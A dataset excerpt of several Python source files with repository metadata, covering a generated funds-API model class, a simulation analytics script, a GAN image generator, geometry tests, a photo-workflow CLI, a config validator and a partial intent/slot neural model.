Dataset schema (one record per source file; 29 columns):

| column | dtype | range / notes |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 4 to 1.02M |
| ext | string | 8 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 4 to 209 |
| max_stars_repo_name | string | length 5 to 121 |
| max_stars_repo_head_hexsha | string | length 40 |
| max_stars_repo_licenses | list | length 1 to 10 |
| max_stars_count | int64 | 1 to 191k, nullable |
| max_stars_repo_stars_event_min_datetime | string | length 24, nullable |
| max_stars_repo_stars_event_max_datetime | string | length 24, nullable |
| max_issues_repo_path | string | length 4 to 209 |
| max_issues_repo_name | string | length 5 to 121 |
| max_issues_repo_head_hexsha | string | length 40 |
| max_issues_repo_licenses | list | length 1 to 10 |
| max_issues_count | int64 | 1 to 67k, nullable |
| max_issues_repo_issues_event_min_datetime | string | length 24, nullable |
| max_issues_repo_issues_event_max_datetime | string | length 24, nullable |
| max_forks_repo_path | string | length 4 to 209 |
| max_forks_repo_name | string | length 5 to 121 |
| max_forks_repo_head_hexsha | string | length 40 |
| max_forks_repo_licenses | list | length 1 to 10 |
| max_forks_count | int64 | 1 to 105k, nullable |
| max_forks_repo_forks_event_min_datetime | string | length 24, nullable |
| max_forks_repo_forks_event_max_datetime | string | length 24, nullable |
| content | string | length 4 to 1.02M |
| avg_line_length | float64 | 1.07 to 66.1k |
| max_line_length | int64 | 4 to 266k |
| alphanum_fraction | float64 | 0.01 to 1 |

Each record below lists its metadata, then its `content` field, then the per-file `avg_line_length`, `max_line_length`, and `alphanum_fraction` statistics. In every record the max_stars_repo_*, max_issues_repo_* and max_forks_repo_* path/name/head_hexsha/licenses fields hold identical values, so they are shown once per record.
hexsha: 441ba79bc36f9e4d678028c705cdcb40a02e9d38 | size: 13,360 | ext: py | lang: Python
path: code/python/FundsAPIforDigitalPortals/v2/fds/sdk/FundsAPIforDigitalPortals/model/fund_notation_screener_search_data_validation_prices.py
repo: factset/enterprise-sdk | head_hexsha: 3fd4d1360756c515c9737a0c9a992c7451d7de7e | licenses: ["Apache-2.0"]
max_stars_count: 6 (2022-02-07T16:34:18.000Z to 2022-03-30T08:04:57.000Z)
max_issues_count: 2 (2022-02-07T05:25:57.000Z to 2022-03-07T14:18:04.000Z)
max_forks_count: null

content:
"""
Funds API For Digital Portals
Search for mutual funds and ETFs using one single consolidated API, including a criteria-based screener. The API provides also base data, key figures, and holdings. A separate endpoint returns the possible values and value range for the parameters that the endpoint /fund/notation/screener/search accepts: Application developers can request the values and value range only for a restricted set of notations that match predefined parameters. This functionality may be used to pre-fill the values and value ranges of the parameters of the /fund/notation/screener/search endpoint so that performing a search always leads to a non-empty set of notations. This API is fully integrated with the corresponding Quotes API, allowing access to detailed price and performance information of instruments, as well as basic security identifier cross-reference. For direct access to price histories, please refer to the Time Series API for Digital Portals. Similar criteria based screener APIs exist for equity instruments and securitized derivatives: See the Stocks API and the Securitized Derivatives API for details. # noqa: E501
The version of the OpenAPI document: 2
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from fds.sdk.FundsAPIforDigitalPortals.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
OpenApiModel
)
from fds.sdk.FundsAPIforDigitalPortals.exceptions import ApiAttributeError
def lazy_import():
from fds.sdk.FundsAPIforDigitalPortals.model.fund_notation_screener_search_data_validation_prices_latest import FundNotationScreenerSearchDataValidationPricesLatest
from fds.sdk.FundsAPIforDigitalPortals.model.fund_notation_screener_search_data_validation_prices_previous import FundNotationScreenerSearchDataValidationPricesPrevious
globals()['FundNotationScreenerSearchDataValidationPricesLatest'] = FundNotationScreenerSearchDataValidationPricesLatest
globals()['FundNotationScreenerSearchDataValidationPricesPrevious'] = FundNotationScreenerSearchDataValidationPricesPrevious
class FundNotationScreenerSearchDataValidationPrices(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'latest': (FundNotationScreenerSearchDataValidationPricesLatest,), # noqa: E501
'previous': (FundNotationScreenerSearchDataValidationPricesPrevious,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'latest': 'latest', # noqa: E501
'previous': 'previous', # noqa: E501
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs): # noqa: E501
"""FundNotationScreenerSearchDataValidationPrices - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
latest (FundNotationScreenerSearchDataValidationPricesLatest): [optional] # noqa: E501
previous (FundNotationScreenerSearchDataValidationPricesPrevious): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""FundNotationScreenerSearchDataValidationPrices - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
latest (FundNotationScreenerSearchDataValidationPricesLatest): [optional] # noqa: E501
previous (FundNotationScreenerSearchDataValidationPricesPrevious): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.")
avg_line_length: 49.850746 | max_line_length: 1,125 | alphanum_fraction: 0.617141

hexsha: c3022c11b35f7d1a8e5a6a63f6fa5e42802f5d20 | size: 3,503 | ext: py | lang: Python
path: tests/movingGridMultiDisk/analytics.py
repo: wangzhezhe/observerchain | head_hexsha: faa8fb9d845a2720704538f01e1e7597083d4510 | licenses: ["MIT"]
max_stars_count: null | max_issues_count: null | max_forks_count: null

content:
from mpi4py import MPI
import numpy as np
import ctypes
import os
import time
import math
import timeit
import sys
import vtk
from vtk.util import numpy_support as VN
sys.path.append('../../src/publishclient/pythonclient')
import pubsub as pubsubclient
#comm = MPI.COMM_WORLD
#rank = comm.Get_rank()
# given the coordinates of a point, return the index of the corresponding grid cell in the flat array
initp = 1.5
targetValue = 7.5
def sendEventToPubSub(ts):
addrList = pubsubclient.getServerAddr()
print (addrList)
addr = addrList[0]
eventList = ["dataPattern_1"]
    # this should be deleted
clientId = "test" + "_" + str(ts)
metainfo = "GRID[<-1,-1>:<-1,-1>]%TS["+str(ts)+"]"
matchtype = "NAME"
pubsubclient.publishEventList(addr,eventList,clientId,metainfo,matchtype)
def getIndex(px, py, pz):
    # TODO should add all boundary cases
# only for lower case
r = 15
gridnum = 15
deltar = 1.0*r/gridnum
return pz*15*15+py*15+px
def checkAndPublishEvent(gridDataArray_p1, gridDataArray_p2):
coord1 = []
coord2 = []
# get the index of red block in data 1
# print("caculate coord1")
break_flag=False
for x in range(15):
if(break_flag==True):
break
for y in range (15):
if(break_flag==True):
break
for z in range (15):
index = getIndex(x,y,z)
if (gridDataArray_p1[index]==targetValue):
coord1 = [x,y,z]
break_flag=True
#print(coord1)
break
# get the index of the red block in data 2
#print("caculate coord2")
break_flag=False
for x in range(15):
if(break_flag==True):
break
for y in range (15):
if(break_flag==True):
break
for z in range (15):
index = getIndex(x,y,z)
if (gridDataArray_p2[index]==targetValue):
coord2 = [x,y,z]
break_flag=True
#print(coord2)
break
distance = pow((coord2[0]-coord1[0]),2)+pow((coord2[1]-coord1[1]),2)+pow((coord2[2]-coord1[2]),2)
#print(distance)
if(distance>140 and distance<150):
return True
else:
return False
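# Editor's note: an optional, hedged helper (not called anywhere in this script). Assuming the
# flat arrays follow the index = z*15*15 + y*15 + x layout used by getIndex above, the nested
# scan for the target cell can also be written with numpy; it returns [x, y, z] like the loops.
def findTargetCoord(gridDataArray):
    hits = np.argwhere(np.asarray(gridDataArray).reshape(15, 15, 15) == targetValue)
    if len(hits) == 0:
        return []
    z, y, x = hits[0]
    return [int(x), int(y), int(z)]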
def getDataFromDisk(ts):
# range the iteration
# get data1
reader = vtk.vtkXMLImageDataReader()
file_0 = "image_rank0"+"/"+"image"+str(ts)+ ".vti"
reader.SetFileName(file_0)
reader.Update()
pressuredata0 = reader.GetOutput().GetCellData().GetArray('pressure')
data0 = VN.vtk_to_numpy(pressuredata0)
file_1 = "image_rank1"+"/"+"image"+str(ts) + ".vti"
#print(file_1)
reader.SetFileName(file_1)
reader.Update()
pressuredata1 = reader.GetOutput().GetCellData().GetArray('pressure')
data1 = VN.vtk_to_numpy(pressuredata1)
return data0, data1
if (len(sys.argv)!=2):
print("analytics <iteration>")
exit(0)
iteration = int(sys.argv[1])
startanay = timeit.default_timer()
for ts in range (iteration):
print("current ts %d"%(ts))
data1, data2 = getDataFromDisk(ts)
# check data1 data2
#print("get data1")
#print (data1)
#print("get data2")
#print (data2)
    patternHappened = checkAndPublishEvent(data1,data2)
    if(patternHappened==True):
        print("pattern happened at ts %d"%(ts))
break
endanay = timeit.default_timer()
print("time span")
print(endanay-startanay)
avg_line_length: 23.198675 | max_line_length: 101 | alphanum_fraction: 0.599201

hexsha: 74fc2028cea525b823b293ec9a4ca020c6d91655 | size: 4,465 | ext: py | lang: Python
path: src/model.py
repo: HenrySilvaCS/esotericpainter | head_hexsha: e510e8e4fadf83979eeb9f1d8e85ce20f0a0ddf8 | licenses: ["Unlicense"]
max_stars_count: null | max_issues_count: null | max_forks_count: null

content:
import torch
import torch.nn as nn
from torchvision.utils import make_grid
from torchvision.utils import save_image
from torchvision import transforms
import matplotlib.pyplot as plt
import os
from random_word import RandomWords
import random
BASEDIR = os.getcwd() + "/"
DATADIR = BASEDIR + "random_generated_images/"
MODELSDIR = BASEDIR + "model_parameters/"
os.makedirs(DATADIR,exist_ok=True)
os.makedirs(MODELSDIR,exist_ok=True)
stats = (0.5, 0.5, 0.5), (0.5, 0.5, 0.5)
def get_default_device():
"""Pick GPU if available, else CPU"""
if torch.cuda.is_available():
return torch.device('cuda')
else:
return torch.device('cpu')
def to_device(data, device):
"""Move tensor(s) to chosen device"""
if isinstance(data, (list,tuple)):
return [to_device(x, device) for x in data]
return data.to(device, non_blocking=True)
def denorm(img_tensors):
return img_tensors * stats[1][0] + stats[0][0]
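# NOTE (editor): the local save_image defined below shadows torchvision.utils.save_image imported
# above; only the matplotlib-based version defined here is actually used in this module.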
def save_image(images,nmax=128,show_images=False,return_path=False):
fig, ax = plt.subplots(figsize=(8, 8))
ax.set_xticks([]); ax.set_yticks([])
ax.imshow(make_grid(denorm(images.detach()), nrow=8).permute(1, 2, 0))
random_name = RandomWords().get_random_word()
print(f"File saved at:{DATADIR + random_name}.png")
plt.savefig(DATADIR + f"{random_name}.png")
if show_images:
plt.show()
if return_path:
return DATADIR + random_name + ".png"
class GEHENNUM:
def __init__(self,latent_dim=128):
self.latent_dim = latent_dim
self.stats = stats
self.discriminator = nn.Sequential(
# in: 3 x 64 x 64
nn.Conv2d(3, 64, kernel_size=4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(64),
nn.LeakyReLU(0.2, inplace=True),
# out: 64 x 32 x 32
nn.Conv2d(64, 128, kernel_size=4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(128),
nn.LeakyReLU(0.2, inplace=True),
# out: 128 x 16 x 16
nn.Conv2d(128, 256, kernel_size=4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.2, inplace=True),
# out: 256 x 8 x 8
nn.Conv2d(256, 512, kernel_size=4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(512),
nn.LeakyReLU(0.2, inplace=True),
# out: 512 x 4 x 4
nn.Conv2d(512, 1, kernel_size=4, stride=1, padding=0, bias=False),
# out: 1 x 1 x 1
nn.Flatten(),
nn.Sigmoid())
self.generator = nn.Sequential(
# in: latent_size x 1 x 1
nn.ConvTranspose2d(128, 512, kernel_size=4, stride=1, padding=0, bias=False),
nn.BatchNorm2d(512),
nn.ReLU(True),
# out: 512 x 4 x 4
nn.ConvTranspose2d(512, 256, kernel_size=4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(256),
nn.ReLU(True),
# out: 256 x 8 x 8
nn.ConvTranspose2d(256, 128, kernel_size=4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(128),
nn.ReLU(True),
# out: 128 x 16 x 16
nn.ConvTranspose2d(128, 64, kernel_size=4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(64),
nn.ReLU(True),
# out: 64 x 32 x 32
nn.ConvTranspose2d(64, 3, kernel_size=4, stride=2, padding=1, bias=False),
nn.Tanh()
# out: 3 x 64 x 64
)
self.device = get_default_device()
self.discriminator = to_device(self.discriminator,self.device)
self.generator = to_device(self.generator,self.device)
        self.generator.load_state_dict(torch.load(MODELSDIR + "gehennum_generator.ckpt", map_location=self.device))
        self.discriminator.load_state_dict(torch.load(MODELSDIR + "gehennum_discriminator.ckpt", map_location=self.device))
def generate_image(self,save_img = True):
noise = torch.randn(128, self.latent_dim, 1, 1)
images = self.generator.forward(noise.to(self.device))
logits = self.discriminator.forward(images)
best_img_idx = int(torch.argmax(logits).to("cpu"))
if(save_img):
save_image(images[best_img_idx,:,:,:].to("cpu"))
return images[best_img_idx,:,:,:].to("cpu")
def main():
print("Generating image...")
gehennum = GEHENNUM()
img = gehennum.generate_image()
print("Done!")
if __name__ == "__main__":
main()
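# Editor's note: an optional, hedged smoke test (never called above). It avoids GEHENNUM's
# __init__, which requires the saved .ckpt files, and only exercises denorm() with a stand-in
# tensor that has the generator's output shape and [-1, 1] range.
def _denorm_smoke_test():
    fake_images = torch.tanh(torch.randn(4, 3, 64, 64))  # same shape/range as generator output
    out = denorm(fake_images)                             # maps [-1, 1] back to [0, 1]
    assert out.shape == (4, 3, 64, 64)
    assert float(out.min()) >= 0.0 and float(out.max()) <= 1.0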
avg_line_length: 34.882813 | max_line_length: 98 | alphanum_fraction: 0.606271

hexsha: 2e7b5bc37e2df0ffe1b63c1db29d516ab0e0da50 | size: 1,352 | ext: py | lang: Python
path: tests/geometry/test_analytical.py
repo: adacko/compas | head_hexsha: 47c443ad3825897ec7ed932ec20734c2f08ef120 | licenses: ["MIT"]
max_stars_count: null
max_issues_count: null
max_forks_count: 1 (2022-01-16T02:32:43.000Z to 2022-01-16T02:32:43.000Z)

content:
import pytest
from compas.geometry import circle_evaluate
from compas.geometry import ellipse_evaluate
from compas.geometry import archimedean_spiral_evaluate
from compas.geometry import logarithmic_spiral_evaluate
from compas.geometry import helix_evaluate
from math import pi
def test_circle():
threshold = 1e-6
x, y, z = circle_evaluate(0, 1, 0)
assert x == 1 and y == 0 and z == 0
x, y, z = circle_evaluate(0, 1, 1)
assert x == 1 and y == 0 and z == 1
x, y, z = circle_evaluate(pi / 2, 1, 0)
assert x < threshold and x > -threshold and y == 1 and z == 0
x, y, z = circle_evaluate(0, 0, 0)
assert x == 0 and y == 0 and z == 0
x, y, z = circle_evaluate(0, -1, 0)
assert x == -1 and y == 0 and z == 0
def test_ellipse():
threshold = 1e-6
x, y, z = ellipse_evaluate(0, 1, 1, 0)
assert x == 1 and y == 0 and z == 0
x, y, z = ellipse_evaluate(0, 2, 1, 1)
assert x == 2 and y == 0 and z == 1
x, y, z = ellipse_evaluate(pi / 2, 1, 1, 0)
assert x < threshold and x > -threshold and y == 1 and z == 0
x, y, z = ellipse_evaluate(pi / 2, 1, 2, 0)
assert x < threshold and x > -threshold and y == 2 and z == 0
x, y, z = ellipse_evaluate(0, 0, 0, 0)
assert x == 0 and y == 0 and z == 0
x, y, z = ellipse_evaluate(0, -1, 1, 0)
assert x == -1 and y == 0 and z == 0
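# Editor's note: hedged reference implementations, not part of the test module. They are what
# the assertions above imply for compas.geometry's circle_evaluate/ellipse_evaluate, namely the
# plain parametric forms; the real functions under test are the ones imported at the top.
def _reference_circle_evaluate(t, r, z):
    from math import cos, sin
    return r * cos(t), r * sin(t), z
def _reference_ellipse_evaluate(t, a, b, z):
    from math import cos, sin
    return a * cos(t), b * sin(t), z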
avg_line_length: 36.540541 | max_line_length: 65 | alphanum_fraction: 0.599112

hexsha: de85033fcef6ad0866cc53a04cba0e502b3324fc | size: 6,414 | ext: py | lang: Python
path: picturebot/cli.py
repo: Tomekske/picturebot-legacy | head_hexsha: 5ca88b53d87bec769991f66ead60a30d6e5a006f | licenses: ["MIT"]
max_stars_count: null
max_issues_count: 1 (2021-11-15T17:49:06.000Z to 2021-11-15T17:49:06.000Z)
max_forks_count: null

content:
"""Console script for picturebot."""
import sys
import os
import json
import shutil
import subprocess
import click
import picturebot as pb
from picturebot.helper import Helper as helper
import picturebot.poco as poco
import generalutils.guard as grd
import picturebot.workspace as ws
from picturebot.directory import Directory as directory
import picturebot.base as baseflow
import picturebot.flow as otherflow
import picturebot.shoot as sht
@click.group()
@click.pass_context
def main(context):
'''Main method where config data and workspace object are initialized
Args:
context (object): Global context object
'''
pathToConfig = helper.FullFilePath("config.json")
    # Check whether the path to the config file exists
grd.Filesystem.PathExist(pathToConfig)
with open(pathToConfig) as f:
        # if context isn't initialized, create a new dictionary
if context.obj is None:
context.obj = dict()
# Load data from file
data = json.load(f)
lstConfig = []
for d in data:
lstConfig.append(poco.Config(d['workspace'], d['workflow'], d['baseflow'], d['backup'], d['selection'], d['edited'], d['preview'], d['editing'], d['instagram']))
c = 1
# Load the config data in the context variable
#x = poco.Config(data['workspace'], data['workflow'], data['baseflow'], data['backup'], data['selection'], data['edited'], data['preview'], data['editing'], data['instagram'])
#context.obj['config'] = poco.Config(data[c]['workspace'], data[c]['workflow'], data[c]['baseflow'], data[c]['backup'], data[c]['selection'], data[c]['edited'], data[c]['preview'], data[c]['editing'], data[c]['instagram'])
context.obj['config'] = lstConfig
# Load the workspace object into the context variable
context.obj['workspaceObj'] = ws.Workspace(pathToConfig, context)
# print(data[1]['workspace'])
# print(context.obj['config'])
@main.command()
@click.option('--create', '-c', nargs=1, help='Create a new workspace')
@click.pass_context
def workspace(context, create):
'''Create a new workspace
Args:
context (object): Global context object
create (object): Create a new workspace
'''
ctx = helper.Context(context)
# Get the current working directory of where the script is executed
cwd = os.getcwd()
#Check whether the current working directory exists
grd.Filesystem.PathExist(cwd)
if create:
ctx.WorkspaceObj.Create(create[0])
@main.command()
@click.option('--backup', '-b', nargs=2, type=str, help='Make a copy of a picture in the backup flow')
@click.option('--massbackup', '-mb', nargs=1, type=str, help='Make a copy of all pictures within the base flow and copy them to the backup flow')
@click.option('--rename', '-r', nargs=3, type=str, help='Rename a picture within the baseflow according to its shoot name')
@click.option('--hash', '-h', nargs=1, type=str, help='Hash rename a picture')
@click.option('--massrename', '-mr', nargs=1, help='Rename all pictures within the baseflow according to their shoot names')
@click.option('--convert', '-c', nargs=3, type=str, help='Convert a raw picture within the base flow to a jpg format and store it within the preview flow')
@click.pass_context
def base(context, backup, massbackup, hash, rename, massrename, convert):
'''Method to backup files from the baseflow project
Args:
context (object): Global context object
backup (object): Make a copy of a picture in the backup flow
massbackup (object): Make a copy of all pictures within the base flow and copy them to the backup flow
        rename (object): Rename a picture within the baseflow according to its shoot name
        massrename (object): Rename all pictures within the baseflow according to their shoot names
convert (object): Convert a raw picture within the base flow to a jpg format and store it within the preview flow
'''
ctx = helper.Context(context)
if backup:
bs = baseflow.Base(ctx, backup[0])
bs.Backup(backup[1])
elif massbackup:
bs = baseflow.Base(ctx, massbackup[0])
bs.MassBackup()
elif hash:
bs = baseflow.Base(ctx, hash[0])
bs.HashRename()
elif rename:
bs = baseflow.Base(ctx, rename[0])
bs.Rename(rename[1], rename[2])
elif massrename:
bs = baseflow.Base(ctx, massrename[0])
bs.MassRename()
elif convert:
bs = baseflow.Base(ctx, convert[0])
bs.Convert(convert[1], convert[2])
@main.command()
@click.option('--show', '-s', is_flag=True, help='Open config file in an editor')
@click.option('--location', '-l', is_flag=True, help='Print config file location')
@click.option('--version', '-v', is_flag=True, help='Print picturebot script version')
@click.pass_context
def config(context, show, location, version):
'''CLI command that handles the configuration file operations
Args:
context (object): Global context object
        show (object): Option that opens the configuration file in an editor
        location (object): Option that prints the configuration file location within the filesystem
        version (object): Option that prints the picturebot script version
'''
ctx = helper.Context(context)
if show:
ctx.WorkspaceObj.ShowConfig()
elif location:
ctx.WorkspaceObj.PrintConfig()
elif version:
ctx.WorkspaceObj.Version()
@main.command()
@click.option('--completed', '-c', is_flag=True, help='View config file')
@click.option('--edited', '-e', is_flag=True, help='View config file')
@click.pass_context
def flow(context, completed, edited):
ctx = helper.Context(context)
fw = otherflow.Flow(ctx)
if completed:
fw.Completed()
elif edited:
fw.Edited()
@main.command()
@click.option('--new', '-n', nargs=3, type=str, help='Create a new shoot')
@click.pass_context
def shoot(context, new):
'''Shoot option allows modification of a shoot within the workspace
Args:
context (object): Global context object
new (object): Option to create a new shoot (<name> <date>)
'''
ctx = helper.Context(context)
if new:
newShoot = f'{new[1]} {new[2]}'
# Create a shoot object
s = sht.Shoot(ctx, new[0], newShoot)
# Creates the shoot
s.Create()
if __name__ == "__main__":
main() # pragma: no cover
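# Editor's note: hedged example invocations, not part of the module. The console-script name
# "picturebot" is an assumption based on the package name, and the placeholder values are
# illustrative only; the option arity matches the click declarations above.
#
#   picturebot workspace --create <workspace-name>
#   picturebot base --massbackup <flow-name>
#   picturebot config --show
#   picturebot shoot --new <flow-name> <shoot-name> <date>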
avg_line_length: 36.651429 | max_line_length: 230 | alphanum_fraction: 0.663704

hexsha: 246e9679df4bf65cbf2a60b5539ee180b1865bd8 | size: 735 | ext: py | lang: Python
path: src/config/config.py
repo: gregdurham/pyregistrator | head_hexsha: d58172145d1c380cef1be85ee7eee30b6e93ccaa | licenses: ["MIT"]
max_stars_count: null
max_issues_count: 1 (2015-10-11T02:07:51.000Z to 2015-10-11T02:07:51.000Z)
max_forks_count: null

content:
from pykwalify.core import Core
from pykwalify.errors import SchemaError
from pkg_resources import resource_filename
import logging
logging.basicConfig()
logging.getLogger("pykwalify").setLevel(logging.CRITICAL)
class Config(object):
def __init__(self, config):
self.config = config
def validate(self):
c = Core(source_data=self.config, schema_files=[resource_filename('pyregistrator', 'schemas/config.yaml')])
try:
c.validate(raise_exception=True)
        except SchemaError as e:
            raise RuntimeError("Configuration validation failed") from e
def get_paths(self):
return self.config.get("paths")
def get_commands(self):
return self.config.get("commands")
avg_line_length: 29.4 | max_line_length: 115 | alphanum_fraction: 0.703401

hexsha: 03d0ea64d979652bf759e06f5b8fd3b3a6d6cea7 | size: 12,020 | ext: py | lang: Python
path: PaperwithCode/1.Co-Interactive-Transformer/joint_model.py
repo: techthiyanes/nlp-notebook | head_hexsha: 0e5f4b75e635128d4056c89a6c65bea60c15e836 | licenses: ["MIT"]
max_stars_count: 136 (2021-04-18T12:03:55.000Z to 2022-03-31T14:58:46.000Z)
max_issues_count: 3 (2021-08-08T08:38:06.000Z to 2022-03-26T17:17:40.000Z)
max_forks_count: 40 (2021-05-18T06:55:37.000Z to 2022-03-30T00:47:12.000Z)

content:
# -*- coding: utf-8 -*-
import torch
import torch.nn as nn
import torch.nn.functional as F
from crf import CRF
class Label_Attention(nn.Module):
def __init__(self, intent_emb, slot_emb):
# intent_emb:[n_class, hidden_dim]
# slot_emb:[n_tag, hidden_dim]
super(Label_Attention, self).__init__()
self.W_intent_emb = intent_emb.weight #[n_class, hidden_dim]
self.W_slot_emb = slot_emb.weight #[n_tag, hidden_dim]
def forward(self, input_intent, input_slot):
# input_intent:[batch size, seq len, hidden_dim]
# input_slot:[batch size, seq len, hidden_dim]
intent_score = torch.matmul(input_intent, self.W_intent_emb.t()) #[batch size, seq len, n_class]
slot_score = torch.matmul(input_slot, self.W_slot_emb.t()) #[batch size, seq len, n_tag]
intent_probs = nn.Softmax(dim=-1)(intent_score) #[batch size, seq len, n_class]
slot_probs = nn.Softmax(dim=-1)(slot_score) #[batch size, seq len, n_tag]
intent_res = torch.matmul(intent_probs, self.W_intent_emb) #[batch size, seq len, hidden_dim]
slot_res = torch.matmul(slot_probs, self.W_slot_emb) #[batch size, seq len, hidden_dim]
return intent_res, slot_res
class I_S_Block(nn.Module):
def __init__(self, hidden_size, n_heads, dropout, device):
super(I_S_Block, self).__init__()
self.I_S_Attention = I_S_SelfAttention(hidden_size, n_heads, dropout, device)
self.I_Out = SelfOutput(hidden_size, dropout)
self.S_Out = SelfOutput(hidden_size, dropout)
self.I_S_Feed_forward = Intermediate_I_S(hidden_size, dropout, device)
def forward(self, H_intent_input, H_slot_input, mask):
# H_intent_input: [batch size, seq len, hidden_dim]
# H_slot_input: [batch size, seq len, hidden_dim]
# mask: [batch size, seq len]
H_intent, H_slot = self.I_S_Attention(H_intent_input, H_slot_input, mask)
# H_intent: [batch size, seq len, hidden_dim]
# H_slot: [batch size, seq len, hidden_dim]
H_intent = self.I_Out(H_intent, H_intent_input) # [batch size, seq len, hidden_dim]
H_slot = self.S_Out(H_slot, H_slot_input) # [batch size, seq len, hidden_dim]
H_intent, H_slot = self.I_S_Feed_forward(H_intent, H_slot)
# H_intent: [batch size, seq len, hidden_dim]
# H_slot: [batch size, seq len, hidden_dim]
return H_intent, H_slot
class Intermediate_I_S(nn.Module):
def __init__(self, hidden_size, dropout, device):
super(Intermediate_I_S, self).__init__()
self.dense_in = nn.Linear(hidden_size * 6, hidden_size)
self.intermediate_act_fn = nn.ReLU()
self.dense_out = nn.Linear(hidden_size, hidden_size)
